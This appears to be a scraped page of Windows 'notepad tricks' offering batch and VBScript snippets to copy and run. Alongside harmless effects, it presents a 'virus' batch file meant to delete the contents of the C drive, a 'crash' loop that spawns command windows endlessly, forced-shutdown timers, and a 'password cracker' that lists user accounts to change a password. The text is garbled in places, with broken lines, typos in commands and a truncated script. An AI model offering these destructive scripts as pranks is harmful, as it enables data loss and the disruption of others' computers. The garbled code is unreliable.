You are on page 1of 8

1. Open Noteapad and copy below code into it.

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random%
%random% %random% %random%
goto start
2. Now save this file as Matrix.bat (name can be anything but .bat is must)
3. Open your saved file and you will have matrix effect on your screen. - See more at:
http://www.coolhackingtrick.com/2013/01/top-5-cool-notepad-tricks.html#sthash.E61UpfgV.dpuf

In this trick we will be creating virus in notepad using batch file programming. This virus is really
simple to create yet very dangerous. opening this file we delete or format C drive of your computer.
1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y
2. Then Save this file as virus.bat
3. Now, running this file format C Drive. - See more at:
http://www.coolhackingtrick.com/2013/01/top-5-cool-notepad-tricks.html#sthash.E61UpfgV.dpuf

In this part i will show you to make interesting file using


dance. basically we will be creating a visual basic script.

notepad which will make keyboard led to

1. Open Notepad and copy below codes into it.

Set wshShell =wscript.CreateObject("WScript.Shell")


do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as dance.vbs (name can be anything but .vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.

Keyboard Dancing Led Light Trick

- See more at: http://www.coolhackingtrick.com/2013/01/top-5-cool-notepadtricks.html#sthash.E61UpfgV.dpuf

MATRIX EFFECT

Copy and Paste the following into Notepad...

@echo of
title Matrix
:loop
:matrix
color 04
echo %random%%random%%random%%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%%random%%random%%random%%random
%%random%%random%%random%
echo %random%%random%%random%%random%%random%%random%%random%%random%
%random%%random%%random%%random%%random%%random%%random%%random%%random
%%random%%random%%random%
goto matrix
goto loop

then save it as Matrix.bat and enjoy!


MAKE A GOTO MENU

Copy and Paste the following into Notepad...

@echo of
:menu

title MenuMaker V0.1


color 06
cls
echo.
echo.
echo Menu Tester...
echo Type 1 for fun!
echo Type 2 for a bun!
set /p choice=
If %choice% EQU 1 goto fun
If %choice% EQU 2 goto bun
:fun
title !!!Fun!!!
color 08
cls
echo !!!FUN!!!
echo NO FUN HERE!
pause
goto menu
:bun
title !!!Bun!!!
color 08
cls
echo !!!Bun!!!
echo No bun here...
pause
goto menu

COMPUTER-BOOTER PROGRAM

Copy and Paste the following into Notepad...

@echo of
:Main
title ComputerBooter V0.1
cls
color A
echo.
echo.
echo 1} About This Program
echo 2} Exit This Program
echo.
echo 3} Shutdown Computer
echo 4} Restart Computer
echo 5} Logof Computer
echo.
echo 6} Start Control Panel
echo 7} Start System32 Folder
echo.
echo 8} Crash your Computer
echo.
echo 9} Our coding Website
set /p select=
if %select% EQU 1 goto About
if %select% EQU 2 goto Exit
if %select% EQU 3 goto Shutdown
if %select% EQU 4 goto Restart
if %select% EQU 5 goto Logof
if %select% EQU 6 goto Control
if %select% EQU 7 goto System32
if %select% EQU 8 goto Crash
if %select% EQU 9 goto Webpage
:About
title About ComputerBooter V0.1
color E
cls
echo.
echo.
echo ABOUT COMPUTERBOOTER 0.1 FOR WINDOWS
echo (BATCH FILE VERSION)
echo.
echo All Of this program was created by NotepadCodes
echo.
echo.
echo For more info visit http://www.notepadcodes.webs.com Or type in Start
set /p web=
if %web% EQU Start goto Webpage else goto Main
:Exit
Exit
goto Exit

:Shutdown
start C:\Windows\System32\Shutdown.exe -s -t 5 -c "ComputerBooter Will now Shutdown Your
Computer"
goto Main
:Restart
start C:\Windows\System32\Shutdown.exe -r -t 5 -c "ComputerBooter Will now Shutdown Your
Computer"
goto Main
:Logof
start C:\Windows\System32\Shutdown.exe -l -t 5 -c "ComputerBooter Will now Logof Your Account"
goto Main
:Control
start Control Panel
goto Main
:System32
start C:\Windows\System32
goto Main
:Webpage
echo Currently Loading
ping localhost -n 1 >nul
cls
echo Currently Loading.
ping localhost -n 1 >nul
cls
echo Currently Loading..
ping localhost -n 1 >nul
cls
echo Currently Loading...
ping localhost -n 1 >nul
cls
echo Successfully Loaded...
ping localhost -n 2 >nul
start http://www.notepadcodes.webs.com
echo Booting Up Menu...
ping localhost -n 2 >nul
goto Main
:Crash
start C:\windows\system32\CMD.exe
goto Crash

Then save it as BOOT.bat and enjoy!


TIMER (COUNT DOWN)

Copy and paste the following into notepad...

@echo of
:Start
title timer
color EC
echo Type in an amount of time (Seconds)
set /p time=
color CE
:loop
cls
ping localhost -n 2 >nul
set /a time=%time%-1
echo %time%
if %time% EQU 0 goto Timesup
goto loop
:Timesup
title Time Is Up!
ping localhost -n 2 >nul
ping localhost -n 2 >nul
cls
echo The Time is up!
pause
cls
echo Thank you for using this software.
pause
goto Web
goto Exit
:Web
start http://www.notepadcodes.webs.com
:Exit
Exit
goto Exit

Save it as Timer.bat and enjoy!


TIMER - SHUTDOWN COMPUTER WHEN TIMEOUT

@echo of
:Start
title timer
color EC
echo Type in an amount of time (Seconds)
set /p time=
color CE
:loop
cls

ping localhost -n 2 >nul


set /a time=%time%-1
echo %time%
if %time% EQU 0 goto Timesup
goto loop
:Timesup
title Time Is Up!
ping localhost -n 2 >nul
ping localhost -n 2 >nul
color 5F
echo You have 20 seconds before Windows Will shut down!
ping localhost -n 20 >nul

ping localhost -n 2 >nul


ping localhost -n 2 >nul
ping localhost -n 1 >nul
ping localhost -n 1 >nul
ping localhost -n 1 >nul
goto Shutdown

:Shutdown
color 4F
echo Windows is now shutting down!
ping localhost -n 1 >nul
start C:\Windows\System32\Shutdown.exe -s
USER PASSWORD CODE CRACKER V1

Type this code into notepad, and you can type in a user and change the password!

@echo

title CodeCracker By NotepadCodes!


color 5E
echo CodeCracher V1
echo

By NotepadCodes.webs.com

echo ******************************************************************
echo.
net user
echo type in a username in the option above:
Set /p username=
net user %username%
echo Changing Password...

and save it as PasswordCracker.bat!


NOTE:
THIS WONT WORK ON ALL MACHINES!

You might also like